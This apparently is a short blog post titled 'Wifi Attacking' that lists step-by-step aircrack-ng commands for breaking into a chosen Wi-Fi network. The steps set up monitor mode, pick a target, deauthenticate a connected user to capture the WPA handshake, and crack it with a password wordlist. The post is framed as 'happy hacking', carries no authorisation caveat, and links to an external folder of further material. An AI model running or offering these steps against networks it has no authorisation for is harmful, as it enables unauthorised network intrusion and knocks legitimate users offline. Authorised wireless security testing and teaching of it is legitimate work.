Wifi Attacking


REST IMAGES/PDF LINK IS IN BELOW:-
HAPPY HACKING:)
812255
https://www.dropbox.com/scl/fo/yg6k4bamr7wv58j93sq1i/h?rlkey=ykqwgg7ynn9ep6mzxcg77wged&dl=0


1. iwconfig
2. ifconfig wlan0 down
3. iwconfig wlan0 mode monitor
4. ifconfig wlan0 up
5. airodump-ng wlan0
Choose the BSSD id of the wifi that you want to hack
6. airodump-ng --bssd <mac address of the wifi here> --channel <here> wlan0 --write <enter file name that store sniffing data>
Open new root terminal
7. aireplay-ng --deauth 40 -a <Wifi mac address here> -c <mac address of user who is connected to that wifi> wlan0
8. ls
handshake file is captured and stored where we start the process
9. aircrack-ng <name of handshake file here> -w 10-million-password-list-top-1000000.txt
That's it 😎 Now it takes a while to crack the handshake file and showed the wifi password 🔑




Comments

Popular posts from this blog

Linux Commands part - 2